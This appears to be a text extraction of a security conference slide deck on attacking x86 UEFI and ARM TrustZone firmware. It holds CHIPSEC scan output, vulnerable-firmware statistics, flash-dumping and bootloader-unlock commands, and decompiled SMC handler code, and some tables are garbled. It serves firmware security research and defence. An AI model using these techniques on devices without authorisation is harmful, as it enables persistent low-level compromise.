#### Software attacks on different type of system firmware: arm vs x86

Oleksandr Bazhaniuk @ABazhaniuk Yuriy Bulygin @c7zero

#### Agenda

- Introduction to x86 and arm architecture
- Reverse engineering firmware and hypervisor
- Attack vectors against firmware and hypervisor
- Exploiting Hypervisor
- Conclusions

#### Where is x86 system firmware?



Source: Symbolic execution for BIOS security

## X86 UEFI [Compliant] Firmware

**CPU** Reset



### **ARMv8 Privileges Levels**



## **ARMv8 Paging**



PA

#### **ARM TrustZone Arch Evolution**



### **Qualcomm Snapdragon 810 boot flow stages**



#### **x86 vs ARM Architecture**

|                | <b>x86</b>                                                                                                                                                                     | ARM                                                                                                                                                    |
|----------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------|
| Root of Trust  | Recently introduced Boot Guard<br>(starting Haswell gen) to provide CPU<br>based root of trust ( <u>Safeguarding</u><br><u>rootkits: Intel BootGuard</u> )                     | ARM has ROM for root of trust that<br>checks the boot sequence components.<br>May have OEM unlock mode                                                 |
| TEE            | Virtualization based trusted execution<br>environments. SGX provides enclave<br>execution to user-mode components.<br>SMM is also used as TEE (can be<br>virtualized with STM) | Flexible Secure World arch with<br>capabilities to run trusted apps. Allows<br>privilege level separation in the Secure<br>World context (EL0,EL1,EL3) |
| Virtualization | VMX technology as context switching<br>between VMX root and VMX guest<br>modes. Supports privilege level<br>separation in VMX root                                             | ARM has hyp mode as an exception<br>level                                                                                                              |

## **X86 Hardware Configuration**

#### CPU

- 1. x86 state: GPR (RAX, ...), Control Registers (CRx), Debug Registers (DRx), etc.
- 2. CPU Model Specific Registers (MSR)

#### **CPU and Chipset (SoC)**

- 1. Processor I/O space: I/O ports and I/O BARs
- 2. PCIe devices configuration space
- 3. Memory-mapped PCIe configuration access a.k.a. Enhanced Configuration Access Mechanism (ECAM)
- 4. Memory-mapped I/O ranges
- 5. IOSF Message Bus registers

#### X86 Memory Mapped I/O Registers

- Devices may have more registers than I/O and PCIe CFG spaces can fit so BIOS may reserve physical address ranges for devices
- Ranges are defined by Base Address Registers (BAR). MMIO registers are offsets off of base of MMIO ranges
- Any access to such MMIO range is forwarded to the device which owns this range (local in the CPU or over a system bus to chipset) rather than decoded to DRAM
- mmio command in CHIPSEC can be used to list predefined MMIO BARs, dump entire BAR, and read/write MMIO registers

| MMIO Range                                                                 | BAR                                                                                                                                        | Base                                                                                                                                                                   | Size                                                                                                                    | En?                                                       | Description                                                                                                                                                                                                                                                                         |
|----------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| GTTMMADR<br>SPIBAR<br>HDABAR<br>GMADR<br>DMIBAR<br>MMCFG<br>RCBA<br>MCHBAR | 00:02.0 + 10<br>  00:1F.0 + F0<br>  00:03.0 + 10<br>  00:02.0 + 18<br>  00:00.0 + 68<br>  00:00.0 + 60<br>  00:1F.0 + F0<br>  00:00.0 + 48 | 00000000F000000<br>  0000000FED1F800<br>  0000007FFFFFF000<br>  00000000E0000000<br>  00000000FED18000<br>  00000000FED1C000<br>  0000000FED1C000<br>  0000000FED10000 | 00001000<br>  0000200<br>  00001000<br>  00001000<br>  00001000<br>  00001000<br>  00001000<br>  00004000<br>  00008000 | 1<br>  1<br>  1<br>  1<br>  1<br>  1<br>  1<br>  1<br>  1 | Graphics Translation Table Range<br>  SPI Controller Register Range<br>  HD Audio Controller Register Range<br>  Graphics Memory Range<br>  Root Complex Register Range<br>  PCI Express Register Range<br>  PCH Root Complex Register Range<br>  Host Memory Mapped Register Range |

# chipsec\_util.py mmio list

#### # chipsec\_util.py mmio read|write|dump <BAR\_name> <off> <width> [value]

# chipsec\_util.py mmio read SPIBAR 0x78 4
[CHIPSEC] Read SPIBAR + 0x78: 0x8FFF0F40

### **ARM Hardware Configuration**

#### CPU

- 1. Core state: GPR (R0/X0 R15/X15), CPSR, SPSR, etc.
- 2. Core Configuration Registers (MRC, MRS)

#### CPU and Chipset (SoC)

- 1. Memory-mapped I/O ranges
- 2. PCI over MMIO

## Exploring Device MMIO Ranges...

Things we look for in MMIO:

- Registers accessible from different privilege levels
- Registers accessible at Boot vs Run time
- Addresses/pointers in registers

Methods to test MMIO registers:

- Every register in a specific device
- Every page in entire MMIO range
- Non-zero registers



|             | f9017000-f9017fff<br>f9100000-f9100fff | ÷ | msm-watchdog<br>cci             |
|-------------|----------------------------------------|---|---------------------------------|
| iges        | f920c100-f92fbfff                      | ÷ | f9200000.dwc3                   |
| .3.0        | f9824900-f9824a9f                      | : | mmc⊙                            |
|             | f991e000-f991efff                      | : | msm_serial_hsl                  |
|             | f9924000-f9924fff                      | : | f9924000.i2c                    |
|             | f9928000-f9928fff                      | : | f9928000.i2c                    |
|             | f9963000-f9963fff                      | : | spi_qsd                         |
|             | f9965000-f9965fff                      | : | f9965000.i2c                    |
|             | f9966000-f9966fff                      | : | spi_qsd                         |
| evels       | f9967000-f9967fff                      | : | f9967000.i2c                    |
|             | f9b38000-f9b387ff                      | : | qmp_phy_base                    |
|             | f9b3e000-f9b3e3fe                      | : | qmp_ahb2phy_base                |
|             | fc401680-fc401683                      | : | restart_reg                     |
|             | fc4281d0-fc4291cf                      | : | vmpm                            |
|             | fc4a8000-fc4a9fff                      | : | tsens_physical                  |
|             | fc4ab000-fc4ab003                      | : | /soc/restart@fc4ab000           |
|             | fc4bc000-fc4bcfff                      | : | tsens_eeprom_physical           |
|             | fc820000-fc82001f                      | : | rmb_base                        |
| /proc/iomem | fc880000-fc8800ff                      | : | qdsp6_base                      |
| , p=00, =0e | fda00020-fda0002f                      | : | csi_clk_mux                     |
|             | fda00030-fda00033                      | : | csiphy_clk_mux                  |
|             | fda00038-fda0003b                      | : | csiphy_clk_mux                  |
|             | fda00040-fda00043                      | : | csiphy_clk_mux                  |
|             | fda04000-fda040ff                      | : | fda04000.qcom,cpp               |
|             | fda08000-fda083ff                      | : | fda08000.qcom,csid              |
|             | fda08400-fda087ff                      | : | fda08400.qcom,csid              |
|             | fda08800-fda08bff                      | ÷ | fda08800.qcom,csid              |
|             | fda08c00-fda08cff                      | ÷ | fda08c00.qcom,csid              |
|             | fda0a000-fda0a4ff                      | ÷ | fda0a000.qcom,ispif             |
|             | fda0ac00-fda0adff                      |   | fda0ac00.qcom,csiphy            |
|             | fda0b000-fda0b1ff                      |   | fda0b000.qcom,csiphy            |
|             | fda0b400-fda0b5ff<br>fda0c000-fda0cfff | 1 | fda0b400.qcom,csiphy            |
|             | fdb00000-fdb3ffff                      | 1 | fda0c000.qcom,cci<br>kasl_2d0   |
|             | fec00000-fecffff                       | 1 | kgsl-3d0<br>fdd00000 gcom ocmom |
|             | ff400000-ff5ffff                       | : | fdd00000.qcom,ocmem<br>ath      |
|             | 14000001101111                         | • | ach                             |

## Check known vulnerabilities in x86 UEFI firmware

| Issue                                                           | CHIPSEC Module              | References                                                                                      |
|-----------------------------------------------------------------|-----------------------------|-------------------------------------------------------------------------------------------------|
| SMRAM Locking                                                   | common.smm                  | CanSecWest 2006                                                                                 |
| BIOS Keyboard Buffer Sanitization                               | common.bios_kbrd_buffer     | DEFCON 16                                                                                       |
| SMRR Configuration                                              | common.smrr                 | ITL 2009, CanSecWest 2009                                                                       |
| BIOS Protection                                                 | common.bios_wp              | BlackHat USA 2009, CanSecWest 2013, Black Hat 2013,<br>NoSuchCon 2013                           |
| SPI Controller Locking                                          | common.spi_lock             | Flashrom, Copernicus                                                                            |
| BIOS Interface Locking                                          | common.bios_ts              | <u>PoC 2007</u>                                                                                 |
| Secure Boot variables with keys and configuration are protected | common.secureboot.variables | <u>UEFI 2.4 Spec</u> , All Your Boot Are Belong To Us ( <u>here</u> & <u>here</u> )             |
| Memory remapping attack                                         | remap                       | Preventing and Detecting Xen Hypervisor Subversions                                             |
| DMA attack against SMRAM                                        | smm_dma                     | Programmed I/O accesses: a threat to VMM?, System<br>Management Mode Design and Security Issues |
| SMI suppression attack                                          | common.bios_smi             | Setup for Failure: Defeating Secure Boot                                                        |
| Access permissions to SPI flash descriptor                      | common.spi_desc             | Flashrom                                                                                        |
| Access permissions to UEFI variables defined in UEFI Spec       | common.uefi.access_uefispec | UEFI 2.4 Spec                                                                                   |
| Module to detect PE/TE Header Confusion<br>Vulnerability        | tools.secureboot.te         | All Your Boot Are Belong To Us                                                                  |
| Module to detect SMI input pointer validation vulnerabilities   | tool.smm.smm_ptr            | CanSecWest 2015                                                                                 |

#### **Unprotected x86 firmware in flash (Skylake based desktop)**

|                                                            |                                           |                                                                                                 |                                                                                           |                                       |                | tu SMP Thu Jan 15 17:43:14 UTC 2015 x86_64<br>ad Core (Skylake CPU / Sunrise Point PCH) |
|------------------------------------------------------------|-------------------------------------------|-------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------|---------------------------------------|----------------|-----------------------------------------------------------------------------------------|
| <pre>[+] loaded chi [*] running lo</pre>                   |                                           |                                                                                                 | ios_wp                                                                                    |                                       |                |                                                                                         |
|                                                            | th: /home/us                              | ser/Desktop,                                                                                    | /chipsec/sou                                                                              | urce/t                                |                | <pre>sec/modules/common/bios_wp.pyc</pre>                                               |
| x][ Module: N                                              | 3IOS Region                               | Write Prote                                                                                     | ection                                                                                    |                                       |                |                                                                                         |
| [01] BLE<br>[02] SRC<br>[04] TSS<br>[05] SMM_E<br>[06] BBS | VE<br>BWP<br>on write pro<br>on: Base = 0 | = 0 << BIO<br>= 0 << BIO<br>= 2<br>= 0 << Top<br>= 0 << SMD<br>= 0<br>= 1 << BIO<br>ptection is | OS Write Ena<br>OS Lock Enal<br>p Swap State<br>M BIOS Write<br>OS Interface<br>disabled! | able<br>ble<br>us<br>e Prot<br>e Lock | ection<br>Down |                                                                                         |
| PRx (offset)                                               | Value                                     | Base                                                                                            | Limit                                                                                     | WP?                                   | RP?            |                                                                                         |
| PRØ (84)                                                   | 00000000                                  | 00000000                                                                                        | 00000000                                                                                  | 0                                     | 0              |                                                                                         |
| PR1 (88)                                                   | 00000000                                  | 00000000                                                                                        | 00000000                                                                                  | 0                                     | 0              |                                                                                         |
| PR2 (8C)                                                   | 00000000                                  |                                                                                                 | 00000000                                                                                  | 0                                     | 0              |                                                                                         |
| PR3 (90)                                                   | 00000000                                  |                                                                                                 |                                                                                           | 1                                     | 0              |                                                                                         |
| PR4 (94)                                                   | 00000000                                  | 00000000                                                                                        | 00000000                                                                                  |                                       | 0              |                                                                                         |

# **Vulnerable Systems**

| Manufacturer | Vulnerable<br>firmware images | Vulnerable models                                         |  |  |  |
|--------------|-------------------------------|-----------------------------------------------------------|--|--|--|
| Acer         | 0 - 2                         | 0 - 2                                                     |  |  |  |
| ASRock       | 73                            | ~53 models (all older than Skylake)                       |  |  |  |
| ASUS         | 629                           | ~61 models (all older than Ivy Bridge)                    |  |  |  |
| Dell         | 51                            | ~11 models (Vostro and Inspiron older than 2014)          |  |  |  |
| Gigabyte     | 1117 (345 Skylake+)           | ~247 models including Skylake (6 Gen Intel Core) or newer |  |  |  |
| НР           | 11                            | ~6                                                        |  |  |  |
| Intel        | 0                             | 0                                                         |  |  |  |
| Lenovo       | 75                            | ~26 (ThinkServer TS150-550, ThinkCentre/IdeaCentre)       |  |  |  |
| MSI          | 1461 (495 Skylake+)           | ~98 models including Skylake (6 Gen Intel Core) or newer  |  |  |  |
| Total        | 3417 (16.1%)                  | ~502 models                                               |  |  |  |

DISCOVERING VULNERABLE UEFI FIRMWARE AT SCALE

#### S3 Boot Script Vulnerabilities in Mac EFI and x86 UEFI

[\*] running module: chipsec.modules.common.uefi.s3bootscript

[x] [ Module: S3 Resume Boot-Script Protections

. . .

[!] Found 1 S3 boot-script(s) in EFI variables

[\*] Checking S3 boot-script at 0x000000DA88A018

[!] S3 boot-script is in unprotected memory (not in SMRAM)

[\*] Reading S3 boot-script from memory..

[\*] Decoding S3 boot-script opcodes..

[\*] Checking entry-points of Dispatch opcodes..

[-] Found Dispatch opcode (at 0x4A15) with entry-point 0x0000000DA5C3260: UNPROTECTED

[-] Entry-points of Dispatch opcodes in S3 boot-script are not in protected memory

[-] FAILED: S3 Boot Script and entry-points of Dispatch opcodes do not appear to be protected

#### **Exploiting Mac x86 EFI firmware**

Attack. Modifying PRx registers in unprotected S3 resume boot script

|                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      | All and the second second |
|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|---------------------------|
| liveuser@localhost:/home/liveuser/Desktop/chipsec/source/tool                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        |                           |
| File Edit Tabs Help<br>[CHIPGEC] VID: 8086                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           |                           |
| [CHIPSEC] DID: 0404                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |                           |
| <pre>[+] loaded chipsec.modules.common.bios_wp ['] running loaded modules</pre>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      |                           |
| <pre>[1] running module: chipsec.modules.common.bios_wp [1] Module path: /home/liveuser/Desktop/chipsec/tool/chipsec/modules/common/bios_wp.pyc [1] ====================================</pre>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       |                           |
| <pre>[x][ ===================================</pre>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |                           |
| <pre>[*] BC = 0x18 &lt;&lt; EIOS Control (b:d.f 00:31.0 + 0xDC)<br/>[00] BIOSWE = 0 &lt;&lt; BIOS Write Enable<br/>[01] BLE = 0 &lt;&lt; BIOS Lock Enable<br/>[02] SRC = 2 &lt;&lt; SPI Read Configuration<br/>[04] TSS = 1 &lt;&lt; Top Swap Status<br/>[05] SMM_EWP = 0 &lt;&lt; SMM BIOS Write Protection<br/>[-] BIOS region write protection is disabled!</pre>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 |                           |
| <pre>[+] BIOS Region: Base = 0x00190000, Limit = 0x007FFFF SPI Protected Ranges PRx (offset)   Value   Base   Limit   WP?   RP? PR0 (74)   00000000   00000000   0   0 PR1 (78)   00000000   00000000   0 PR1 (78)   00000000   00000000   0 PR1 (78)   00000000   000000000   0 PR1 (78)   00000000   00000000   0 PR1 (78)   00000000   00000000000   0 PR1 (78)   00000000   000000000000   0 PR1 (78)   00000000   00000000000   0 PR1 (78)   00000000   0 PR1 (78)   00000000   0 PR1 (78)   0 PR</pre> |                           |
| R2 (7C)         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCC         CCCCCCCCC         CCCCCCCCCC         CCCCCCCCCCC         CCCCCCCCCCC         CCCCCCCCCCCC         CCCCCCCCCCCCCCCC         CCCCCCCCCCCCCCC         CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               |                           |
| <pre>!] None of the SPI protected ranges write-protect BIOS region !] BIOS should enable all available SMM based write protection mechanisms or configure SPI protected ranges to protect the entire .] FAILED: BIOS is NOT protected completely HIPSEC] ************************************</pre>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  | e BIOS region             |
| IIPSEC) Modules skipped 0:<br>(IPSEC) ++++++++++++++++++++++++++++++++++++                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           |                           |
| 🚌 🔎 🐂 Iveüser@localho                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                | 1 <b>-</b> 4              |

#### X86 memory configuration

chipsec\_main -m memconfig

| running module: chip                    | sec.modules.memconfig                  |                                                                 |
|-----------------------------------------|----------------------------------------|-----------------------------------------------------------------|
|                                         |                                        |                                                                 |
| [ Module: Host Bridge                   | e Memory Map Locks                     |                                                                 |
| [ ===================================== |                                        |                                                                 |
| PCI0.0.0_BDSM                           |                                        |                                                                 |
| PCI0.0.0_BGSM                           | = 0x000000008B800001 - LOCKED          | - Base of GTT Stolen Memory                                     |
| PCI0.0.0_DPR                            | = 0x000000008B400001 - LOCKED          | - DMA Protected Range                                           |
| PCI0.0.0 GGC                            | = 0x00000000000002C1 - LOCKED          | - Graphics Control                                              |
| PCI0.0.0 MESEG MASK                     | = 0x0000007FFF000C00 - LOCKED          | <ul> <li>Manageability Engine Limit Address Register</li> </ul> |
| PCI0.0.0 PAVPC                          | = 0x000000008FF00047 - LOCKED          | - PAVP Configuration                                            |
| PCI0.0.0 REMAPBASE                      | = 0x00000007FF000001 - LOCKED          | - Memory Remap Base Address                                     |
| PCI0.0.0 REMAPLIMIT                     | = 0x000000086EF00001 - LOCKED          | - Memory Remap Limit Address                                    |
| PCI0.0.0 TOLUD                          | = 0x0000000000000000001 - LOCKED       | - Top of Low Usable DRAM                                        |
| PCI0.0.0 TOM                            | = 0x00000080000001 - LOCKED            | - Top of Memory                                                 |
| PCI0.0.0 TOUUD                          | = 0x000000086F000001 - LOCKED          | - Top of Upper Usable DRAM                                      |
| PCI0.0.0 TSEGMB                         | $= 0 \times 000000008B400001 - LOCKED$ | - TSEG Memory Base                                              |
|                                         | ap registers seem to be locked (       |                                                                 |

Checking LOCK bits in PCIe config registers

#### **ARM Based System Boot Flow**

- Root of trust is in ROM at APSS/RPM
- Read-only ROM verifies RW firmware
- Uses OTP fuses to program OEM lock
  - # adb reboot bootloader
  - # sudo fastboot oem unlock
- TrustZone components (Secure World) initialize and set runtime protection before transferring execution flow to any hypervisor or OS bootloader component

## **Example of ARM SoC Configuration**

#### 0xF9112188 APCS\_COMMON\_CLUST\_LVL\_SEL

Type: RW Clock: SYS\_AHB\_CLK Reset State: 0x00000000

Security Treatment: Controlled by Shared\_secure[CLK]

Select register for various muxes choosing between the corresponding ou or cluster1

#### APCS\_COMMON\_CLUST\_LVL\_SEL

| B | Bits | Name         | Description                               |
|---|------|--------------|-------------------------------------------|
|   | 0    | CLUST_SELECT | 0 indicates cluster 0 selected. 1 indicat |

#### 0xF900D22C APCS\_ALIAS0\_MISC\_PWR\_CTL

Type: RW Clock: SYS\_AHB\_CLK Reset State: 0x00000000

Security Treatment: Controlled by GLB\_SECURE [CFG].

Miscellaneous Power Control Register

#### 0xF900E008 APCS\_ALIAS1\_BOOT\_START\_ADDR\_NSEC

Type: RW Clock: SYS\_AHB\_CLK Reset State: 0xFC010000

Security Treatment: Secure and Nonsecure access

The BOOT\_START\_ADDR\_NSEC register is used to determine the address to boot from in nonsecure mode. It resets to the value on SYS\_apcsCFGRSTADDR[31:16].Reset by SYS\_apcsSYSPor\_Ares|SYS\_apcsSys\_Ares

#### APCS\_ALIAS1\_BOOT\_START\_ADDR\_NSEC

| Bits  | Name          | Туре | Description                                                                   |
|-------|---------------|------|-------------------------------------------------------------------------------|
| 31:16 | START_ADDR    | RW   | Start address for the A53                                                     |
| 2     | BOOT_128KB_EN | RW   | 128 KB BOOT enable                                                            |
| 1     | VINITHI       | R    | This is RO field and returns the copy of<br>BOOT_START_ADDR_SEC VINITHI value |
| 0     | REMAP_EN      | RW   | Enable remapping                                                              |

#### Reverse engineering of the x86 UEFI firmware

- 1. Dump BIOS from SPI chip (or download from vendor web-site)
  - Software method: using CHIPSEC tool: chipsec\_util spi dump <file\_name>
  - HW programmer, for example: dediprog
- 2. Unpack all PEI/DXE executables.
  - chipsec\_util decode rom.bin
- 3. Load to IDA Pro
  - ida-efiutils useful scripts for reverse engineer BIOS/UEFI binary (from snare): <u>https://github.com/snare/ida-efiutils</u>
  - Useful blogposts from: @d\_olex and <u>http://blog.cr4.sh/</u>
  - Find definition of GUID will help to understand functionality
  - Use <u>efiperun</u> to emulate EFI executable

## **ARM TrustZone Binary**

- (Google phones specific) Download factory image from <u>Google repository</u>
- Use <u>unpack bootloader image</u> by <u>laginimaineb</u> to unpack bootloader-<DID>.img
- Extracted files:

aboot cmnlib hyp imgdata keymaster pmic rpm sbll sdi sec tz

• **Disassemble** tz

| $\overline{}$ | Name      | Start    | End      | R | w | Х | D | L | Align   | Base | Туре   | Class | AD | Т  | DS |
|---------------|-----------|----------|----------|---|---|---|---|---|---------|------|--------|-------|----|----|----|
| TZ I          | DOAD LOAD | 06D00000 | 06D44640 | R |   | Х |   | L | page    | 01   | public | CODE  | 32 | 00 | 0B |
| Kernel        | DAD LOAD  | 06D45000 | 06D46F90 | R |   | Х |   | L | mempage | 02   | public | CODE  | 32 | 00 | 0B |
| Keinei        | LOAD      | 06D47000 | 06D4722C | R |   | Х |   | L | mempage | 03   | public | CODE  | 32 | 00 | 0B |
|               | LOAD      | 06D48000 | 06D4B34C | R |   | Х |   | L | mempage | 04   | public | CODE  | 32 | 00 | 0B |
|               | LOAD      | 06D4C000 | 06D5AB20 | R |   |   |   | L | mempage | 05   | public | DATA  | 32 | 00 | 0B |
| ( )           | LOAD      | 06D5B000 | 06D6B75C | R | W |   |   | L | mempage | 06   | public | DATA  | 32 | 00 | 0B |
| ΤΖ            | LOAD      | 06D8BC00 | 06D8C000 | R | W |   |   | L | dword   | 07   | public | DATA  | 32 | 00 | 0B |
| Monitor       | LOAD      | 06D8C000 | 06D8D748 | R | W |   |   | L | byte    | 08   | public | DATA  | 32 | 00 | 0B |
| WOINTOI       | LOAD      | 06D8E000 | 06D96000 | R | W |   |   | L | mempage | 09   | public | DATA  | 32 | 00 | 0B |
|               | LOAD      | 06D96000 | 06D9BFC0 | R |   | Х |   | L | byte    | 0A   | public | CODE  | 64 | 00 | 0B |
|               | IOAD      | 06D9C000 | 06DB30CC | R | W |   |   | L | byte    | 0B   | public | DATA  | 64 | 00 | 0B |

## **Test Environment**

- Rooting unlocked Android Phones: <u>CyanogenMod</u> <u>TWRP</u> with <u>SuperSU</u> and custom kernel
- Useful resources: <u>xda</u> , <u>Code Aurora</u>
- Tools:

<u>The Rekall Forensic and Incident Response Framework</u> <u>Maplesyrup Register Display Tool</u> <u>ARMageddon: Cache Attacks on Mobile Devices</u> <u>Drammer - for testing Android phones for the Rowhammer bug</u>

## ARM TrustZone and Hypervisor Reverse Engineering



## **Open Source TrustZone Implementations**

- ARM reference implementation - <u>ARM Trusted Firmware</u>
  - Boot Loader stage 1 (BL1) AP Trusted ROM
  - Boot Loader stage 2 (BL2) Trusted Boot Firmware
  - Boot Loader stage 3-1 (BL31) EL3 Runtime Software
  - Boot Loader stage 3-2 (BL32) Secure-EL1 Payload (optional)
  - Boot Loader stage 3-3 (BL33) Non-trusted Firmware
- <u>OP-TEE Trusted OS</u> Linux TEE using ARM TrustZone technology. Meets GlobalPlatform System Architecture spec
- Google's <u>Trusty</u> is a set of components supporting a TEE on mobile devices

```
.globl runtime exceptions
     /*
      * This macro handles Synchronous exceptions.
      * Only SMC exceptions are supported.
     .macro handle sync exception
     /* Enable the SError interrupt */
            daifclr, #DAIF ABT BIT
     msr
            x30, [sp, #CTX GPREGS OFFSET + CTX GPREG LR]
     str
            x30, esr el3
     mrs
            x30, x30, #ESR EC SHIFT, #ESR EC LENGTH
     ubfx
     /* Handle SMC exceptions separately from other synchronous exceptions */
            x30, #EC AARCH32 SMC
     cmp
            smc handler32
     b.eq
            x30, #EC AARCH64 SMC
     cmp
            smc handler64
     b.eq
     /* Other kinds of synchronous exceptions are not handled */
     no ret report unhandled exception
     .endm
      * This macro handles FIQ or IRQ interrupts i.e. EL3, S-EL1 and NS
      * interrupts.
                               /bl31/aarch64/runtime exceptions.S" [Modified] 382 lines --10%--
```

### **TrustZone Monitor Vector Table**

| Execution taken from                                                                                                            | Offset for exce          | ption type                                           |             |                                                                                                                                                                                |
|---------------------------------------------------------------------------------------------------------------------------------|--------------------------|------------------------------------------------------|-------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| Exception taken from                                                                                                            | Synchronous              | IRQ or vIRQ                                          | FIQ or vFIQ | SError or vSError                                                                                                                                                              |
| Current Exception level with SP_EL0.                                                                                            | 0x000                    | 0×080                                                | 0x100       | 0x180                                                                                                                                                                          |
| Current Exception level with SP_ELx, x>0.                                                                                       | 0x200                    | 0x280                                                | 0x300       | 0x380                                                                                                                                                                          |
| Lower Exception level, where the implemented level immediately lower than the target level is using AArch64. <sup>a</sup>       | 0x400                    | 0x480                                                | 0x500       | 0x580                                                                                                                                                                          |
| Lower Exception level, where the implemented<br>level immediately lower than the target level is<br>using AArch32. <sup>a</sup> | 0x600                    | 0x680                                                | 0x700       | VBAR_EL3, Vector Base Address Register (EL3) The VBAR_EL3 characteristics are: Purpose Holds the vector base address for any exception that is taken to EL3. Usage constraints |
| Store 6D9B800                                                                                                                   | o VBAR_EL                | _3                                                   |             | EL0       EL1 (NS)       EL1 (S)       EL2 (NS)       EL3 (SCR.NS=1)       EL3 (SCR.NS=                                                                                        |
| 88 00 82 00 58<br>8C 00 C0 1E D5<br>90 00 38 80 D2<br>194 20 42 1B D5                                                           | LDR<br>MSR<br>MOU<br>MSR | X0, =loc_6<br>#6, c12, c<br>X0, #0x1C0<br>#3, c4, c2 | 0, #0, X0   | Traps and Enables There are no traps or enables affecting this register. Configurations RW fields in this register reset to IMPLEMENTATION DEFINED values that might be UNKNO  |

ARMv8 Architecture Reference Manual

#### **TrustZone Monitor SMC Exception Handler**





#### **Open Source TrustZone Driver**



### **SMC Handler Arguments in ARMv8 Systems**





#### **Reversing SMC Default Handler...**



### **Reversing Overlap Checks...**

```
unsigned int fastcall check buffer args with TZ addr overlap(int p buffer , int buffer , int buffer size )
  char *buffer; // r5@1
  char *pbuffer; // r6@1
  int buffer size; // r4@1
  unsigned int result; // r0@1
  char v7; // zf@2
  bool v8; // r108
  buffer = (char *)buffer ;
  pbuffer = (char *)p buffer ;
  buffer size = buffer size ;
                                                                        Check "buffer" pointer for overlapping with TZ
 result = 0xFFFFFFF;
 if ( buffer )
   v7 = pbuffer == 0:
   if ( pbuffer )
     v7 = buffer size == 0;
   if ( 107 )
     if ( check TZ addr overlap (buffer , buffer size ) && !check TZ addr overlap ((int)pbuffer, buffer size) )
        Clean_Data_Cache_Line_((int)buffer, buffer_size);
                                                                                         Copy "buffer" and check for
        memcpy(pbuffer, buffer, buffer size);
        v8 = check TZ addr overlap ((int)buffer, buffer size);
                                                                                    overlapping with TZ every DWORD
       result = 0:
                                                                                                 in the buffer
       if ( 108 )
         result = 0xFFFFFFEE;
                                                                                         (Race Condition protection)
```

#### How the check for overlap with TZ works



#### **Reversing SMC Handlers Table...**



#### **Example of SMC Handler**

}



#### **SMC Handler Communicates with Secure Device**



#### **Reversing Error Codes...**



#### Hypervisor on Snapdragon 808/810

|                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |                  |                                                                                     |                                                                                                                                                                                       | VBAR_EL2             |
